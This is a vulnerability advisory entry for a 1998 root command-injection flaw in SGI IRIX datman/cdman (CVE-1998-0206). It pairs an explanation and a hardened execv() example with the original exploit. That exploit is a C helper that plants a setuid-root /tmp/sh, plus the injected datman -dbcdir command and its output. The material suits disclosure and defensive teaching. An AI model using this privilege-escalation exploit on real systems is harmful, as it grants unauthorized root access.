Vendor: datman/cdman
By: SecurityFocus
CVSS: 7.2 HIGH
Arbitrary Command Execution
CWE: 78
Product Name: datman/cdman
Affected Version From: Irix 6.2
Affected Version To: Irix 5.3
Patch Exists: YES
Related CWE: CVE-1998-0206
CPE: o:sgi:irix:6.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Irix
1998

Arbitrary Command Execution

A vulnerability exists in the datman/cdman program, as included with Irix 6.2 and 5.3 from Silicon Graphics Inc. The vulnerability would allow arbitrary users to execute commands as root. The datman/cdman program searches for the existence of a .cdplayerrc in the user's home directory. If it is found, and no .cddb directory is found, cdman runs the cddbcvt program. This program is invoked with the names of both the old and new databases via a system() call. Because the names are handed to a shell through system(), it is possible to substitute a command to be executed for the name of a database.
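The pattern described above, names pasted into a system() command line, is shown next to a shell-free alternative in the C below. This is an added example, not SGI's code and not part of the original advisory; the function names, the allowlist, and the use of /bin/echo as a stand-in for cddbcvt are assumptions, and the sample paths are constructed.

```c
/* Added example, not SGI's code. Names and /bin/echo stand-in are assumptions. */
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Vulnerable pattern: names pasted into one string for system(). Built only. */
int build_shell_command(char *out, size_t n, const char *conv,
                        const char *olddb, const char *newdb)
{
    return snprintf(out, n, "%s %s %s", conv, olddb, newdb);
}

/* Allowlist: absolute path made of letters, digits and "/._-" only. */
int db_name_is_plain(const char *name)
{
    static const char ok[] = "abcdefghijklmnopqrstuvwxyz"
                             "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789/._-";
    return name[0] == '/' && name[strspn(name, ok)] == '\0';
}

/* Hardened pattern: no shell, one argv element per name, privileges dropped
 * in the child. Returns the converter's exit status, or -1 on refusal/error. */
int run_converter(const char *conv, const char *olddb, const char *newdb)
{
    int status; pid_t pid;
    if (!db_name_is_plain(olddb) || !db_name_is_plain(newdb))
        return -1;
    if ((pid = fork()) < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { (char *)conv, (char *)olddb, (char *)newdb, NULL };
        if (setgid(getgid()) != 0 || setuid(getuid()) != 0)
            _exit(126);              /* could not drop set-id privileges */
        execv(conv, argv);           /* argv is never parsed by a shell */
        _exit(127);
    }
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

int main(void)
{
    char cmd[256];                   /* constructed sample input below */
    build_shell_command(cmd, sizeof cmd, "cddbcvt", "/home/user/.cdplayerrc", "/tmp/blah;/tmp/makesh");
    printf("shell would parse: %s\n", cmd);
    return run_converter("/bin/echo", "/home/user/.cdplayerrc", "/tmp/blah;/tmp/makesh") == -1 ? 0 : 1;
}
```

The allowlist is defence in depth; the property that matters is that execv() receives each database name as a single argument and no shell ever parses it.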

Mitigation:

Upgrade to a version of Irix 6.2 or 5.3 that is not vulnerable to this exploit.

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/347/info


% cat > /tmp/makesh.c
main()
{
seteuid(0); setegid(0);
system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh");
}
% cc /tmp/makesh.c -o /tmp/makesh
% mv .cddb .cddb.old
% touch .cdplayerrc
% /usr/sbin/datman -dbcdir "/tmp/blah;/tmp/makesh"
Created "/tmp/blah"
Converting /home/medc2/yuri/.cdplayerrc into /tmp/blah
% ls -l /tmp/sh
-r-sr-sr-x 1 root sys 140784 Dec 9 15:24 /tmp/sh*